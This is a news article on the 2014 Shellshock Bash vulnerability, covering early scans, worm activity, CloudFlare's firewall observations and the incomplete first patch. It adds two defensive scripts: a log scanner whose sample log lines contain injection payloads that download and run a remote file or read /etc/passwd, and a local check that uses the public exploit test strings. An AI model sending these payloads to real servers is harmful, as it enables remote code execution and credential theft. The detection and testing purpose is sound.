Reports on the latest Bash bug have gone from bad to worse as the damage spreads and many of the early patches prove ineffective. Unlike Heartbleed, which leaked memory, the Bash bug allows remote code execution, so an attacker can use it to run commands and plant malware on a vulnerable host. Most attacks will target web servers and network devices, with experts singling out web applications that hand request data to a shell, such as CGI scripts and PHP-based applications that shell out. Connected devices like smart appliances are expected to stay vulnerable for a long time, since they are slow to be patched, and early reports indicate an alarming number of systems are already at risk. As Kaspersky Lab's David Jacoby put it, "the real scale of the problem is not yet clear."
In one early census, Errata Security's Robert David Graham ran a limited IP scan and found 3,000 vulnerable systems before the scan crashed, noting that embedded web servers on non-standard ports were particularly exposed. A few hours later, Graham discovered that someone was already using the same tactic toward less savory ends. "Someone is using masscan to deliver malware," Graham wrote in an update. "They'll likely have compromised most of the systems I've found by tomorrow morning."
The result is now known as the "Thanks, Rob" worm, and it has many experts worried about short-term attacks that will take place before devices are patched. Because much network hardware runs on Linux or other UNIX-like systems that ship Bash, a lot of the routers and switches that make up the internet may be vulnerable, which would let an attack spiral out of control. Writing for Security Current, Richard Stiennon notes, "[This code] could quickly create a SQL Slammer type Internet meltdown," referring to the 2003 worm that dramatically slowed global internet traffic.
"Oh hey. This thing could bring down the whole internet for a few hours. I'm going to cry in the corner for a minute." (Munin, @munin, on Twitter, September 25, 2014)
Network operators confirm that the bug is being actively exploited. The content delivery network CloudFlare rolled out web-application firewall rules yesterday to protect the sites behind it, and since then it has watched attackers try a wide variety of attacks with the new tool. "We've seen attackers trying to grab password files, download malware onto machines, get remote access, and more," says CloudFlare's John Graham-Cumming. "There was even one attack that involved opening or closing a server's CD / DVD drive."
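The firewall rules CloudFlare describes look for the same thing a defender can look for in their own logs: request fields that begin with the "() {" prefix Bash's function importer keys on. The script below is an added example, not CloudFlare's rules or anything from the article; the four access-log lines are constructed for it (the IPs are documentation ranges), and it assumes the server's log format records the User-Agent string, which not every configuration does.

```shell
#!/bin/sh
# Added example: find web requests carrying a Bash function-definition
# prefix in a header or query string. The log lines are constructed; the
# pattern is the "() {" marker that the importer looks for, with optional
# whitespace because attackers sometimes drop the space.

SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x -O /tmp/x; sh /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() {:;}; cat /etc/passwd"
192.0.2.44 - - [25/Sep/2014:10:02:11 +0000] "GET /?x=() { :;}; HTTP/1.1" 404 221 "-" "curl/7.30"'

# Literal "(", ")", optional whitespace, literal "{". Escaped so that the
# parens and brace are not read as ERE grouping or interval operators.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Number of log lines that carry the marker anywhere in the request.
count_shellshock_hits() {
    printf '%s\n' "$SAMPLE_LOG" | grep -Ec "$SHELLSHOCK_RE"
}

# Source addresses with at least one hit, deduplicated, one per line.
shellshock_sources() {
    printf '%s\n' "$SAMPLE_LOG" | grep -E "$SHELLSHOCK_RE" | cut -d' ' -f1 | sort -u
}

echo "matching requests: $(count_shellshock_hits)"
echo "sources:"
shellshock_sources
```

The query-string line is flagged on purpose: a CGI server exports the query string to the script as an environment variable, so it reaches Bash's importer just as a header does. Matching on the prefix rather than on specific payloads (password files, wget, the CD-tray trick) is what keeps the rule useful as the payloads change.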
Higher-level network hardware may also be vulnerable. Researcher and journalist Ashkan Soltani says the most alarming attack vector he's seen is a Bash vulnerability in F5 Networks' BIG-IP, a gateway appliance that sits between web applications and their users. The vulnerability itself is of limited use, since you would have to be an authenticated F5 user to make the attack work, but it hints at a much larger and more troubling kind of Bash attack. "Many of the high-end networking systems are built atop a Linux / Unix platform that can oftentimes be vulnerable," Soltani says. "A vulnerability in core networking equipment is significantly more problematic than one in a single user's computer since it allows redirection and man-in-the-middle on a mass scale."
In the short term, we're left with a race between IT crews and malware-spreading attackers. Patches have been issued for the major Linux distributions, but many in the community believe they only buy time until a more permanent fix arrives. Secunia has issued an advisory that the initial patch from GNU is incomplete: it closes the published test case without closing every route to the same parser. As another researcher wrote, "if I were a betting man, I would not bet on the fix holding up in the long haul."
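Whether a given machine has the complete fix or only the first, incomplete one is something an administrator can check locally. The script below is an added example rather than anything from the article, Secunia or GNU; it uses the two widely published test strings, the original one-liner and the follow-on case the first patch left open, and reports a result for each.

```shell
#!/bin/sh
# Added example: local check for the Bash environment-import bug.
# Both payloads are the public test strings; neither does anything
# beyond printing a word or writing a file in a scratch directory.

# Check 1: does bash run the command that trails an exported function
# definition?  A vulnerable bash prints "vulnerable" while running the
# harmless inner command; a fixed bash ignores the trailing text.
shellshock_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo harmless' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# Check 2: the parser bug the first patch did not cover.  On a bash with
# only that patch, "echo date" is not echoed; the redirection smuggled in
# through the environment makes bash write the output of `date` into a
# file named "echo" in the working directory.  Run in a throwaway
# directory so that file never lands anywhere that matters.
shellshock_check_incomplete_patch() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "no-bash"
        return 0
    fi
    dir=$(mktemp -d)
    ( cd "$dir" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$dir/echo" ]; then
        result="vulnerable"
    else
        result="patched"
    fi
    rm -rf "$dir"
    echo "$result"
}

echo "function import:   $(shellshock_check)"
echo "incomplete patch:  $(shellshock_check_incomplete_patch)"
```

A "patched" on the first check and "vulnerable" on the second is exactly the state Secunia's advisory warns about: the distribution package has been updated, but to the first fix only. Re-run both after every bash update rather than trusting the package version string.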
9/25 12:09pm ET: Updated to include the statement from CloudFlare.